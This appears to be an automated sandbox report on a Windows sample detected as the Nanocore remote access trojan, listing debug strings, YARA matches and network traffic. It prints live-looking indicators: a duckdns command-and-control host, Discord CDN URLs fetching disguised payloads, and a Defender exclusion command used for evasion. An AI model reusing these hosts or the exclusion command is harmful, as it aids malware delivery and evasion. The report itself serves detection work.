    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb* source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: W.pdb% source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: svchost.exe, 0000000D.00000000.435057111.0000000006418000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Daan\source\repos\NanoExploit\ClientTest\obj\Debug\ClientTest.pdbS.m. _._CorDllMainmscoree.dll source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: System.Core.pdb. source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: Wnpdie.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp
    Source: Binary string: KL\svchost.PDB source: svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.464057620.0000000006E19000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdbjkk source: p9Ts9VV2NZ.exe, 00000000.00000000.319928127.00000000008B7000.00000004.00000020.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359470242.0000000006D6B000.00000004.00000001.sdmp
    Source: Binary string: Vnpdie.pdb source: svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdba source: svchost.exe, 0000000F.00000000.464035689.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: svchost.exe, 0000000D.00000000.435057111.0000000006418000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\p9Ts9VV2NZ.PDB source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb^C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dllAdd-MpPreference -ExclusionPath "C:\Users\Public\Documents\ source: svchost.exe, 0000000F.00000000.464074889.0000000006E1F000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.pdb7 source: svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359271665.0000000006D30000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: npdie.pdb source: svchost.exe, 0000000F.00000000.422620669.0000000000DE7000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb*6 source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\??\C:\Windows\dll\System.pdb source: svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb source: svchost.exe, 0000000D.00000000.456731946.0000000006435000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb44 source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp
    Source: Binary string: C:\Windows\System.pdbpdbtem.pdb* source: svchost.exe, 0000000F.00000000.441310771.0000000006E00000.00000004.00000001.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\p9Ts9VV2NZ.PDB source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359222843.0000000006CE0000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359271665.0000000006D30000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.pdb source: svchost.exe, 0000000F.00000000.441486096.0000000006E29000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp, svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: svchost.exe, 0000000F.00000000.464074889.0000000006E1F000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319928127.00000000008B7000.00000004.00000020.sdmp, svchost.exe, 0000000F.00000000.441310771.0000000006E00000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb\??\C:\Windows\symbols\dll\System.pdba source: svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359399711.0000000006D61000.00000004.00000001.sdmp
    Source: Binary string: (PYi8C:\Windows\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.422620669.0000000000DE7000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Daan\source\repos\NanoExploit\ClientTest\obj\Debug\ClientTest.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: svchost.PDB source: svchost.exe, 0000000F.00000000.422620669.0000000000DE7000.00000004.00000001.sdmp
    Source: Binary string: System.Core.pdbk source: p9Ts9VV2NZ.exe, 00000000.00000000.359399711.0000000006D61000.00000004.00000001.sdmp
    Source: Binary string: p9Ts9VV2NZ.PDB source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp

    Networking:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Users\Public\Documents\???????????????\svchost.exeDomain query: cdn.discordapp.com
    Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.129.233 443
    Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.134.233 443
    Uses dynamic DNS servicesShow sources
    Source: unknownDNS query: name: fridaycav.duckdns.org
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1Host: cdn.discordapp.com
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1Host: cdn.discordapp.com
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1Host: cdn.discordapp.com
    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49691 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49694 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49696 version: TLS 1.0
    Source: global trafficTCP traffic: 192.168.2.3:49693 -> 185.140.53.3:6400
    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
    Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
    Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp, svchost.exe, 0000000F.00000000.424962158.0000000001492000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpString found in binary or memory: http://google.com
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.331793073.0000000002531000.00000004.00000001.sdmp, p9Ts9VV2NZ.exe, 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.562342584.00000000028F1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.426366340.0000000003371000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.331793073.0000000002531000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.562342584.00000000028F1000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.426366340.0000000003371000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
    Source: svchost.exeString found in binary or memory: https://cdn.discordapp.com/attachments/8
    Source: svchost.exe, 0000000F.00000000.426366340.0000000003371000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/897185985257963540/5D70BEC8.jpg
    Source: svchost.exe, 0000000F.00000000.426366340.0000000003371000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/897185987367678032/09E84BB7.jpg
    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1Host: cdn.discordapp.com
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1Host: cdn.discordapp.com
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1Host: cdn.discordapp.com
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmpBinary or memory string: RegisterRawInputDevices

    E-Banking Fraud:

    barindex
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.6164629.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af60a1.12.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c56c41.19.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c4d7e2.20.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTR

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 9.2.p9Ts9VV2NZ.exe.7330000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7170000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.6160000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.30c4ed4.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7380000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7380000.34.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7330000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7170000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.6164629.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.73d0000.38.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.4bbe4f3.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7340000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7350000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7360000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4af60a1.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.73d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4c56c41.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.7394c9f.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.0.svchost.exe.3d8ed58.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.0.svchost.exe.3d8ed58.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.7360000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.739e8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7180000.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.0.svchost.exe.50afd10.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.408b11e.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.7390000.37.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.306c9d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7310000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7390000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4bcc923.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.30d111c.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4c4d7e2.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.7310000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.0.svchost.exe.50afd10.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.4c52618.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7340000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.49deafd.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4bbe4f3.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.0.svchost.exe.50afd10.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.7320000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.57b0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
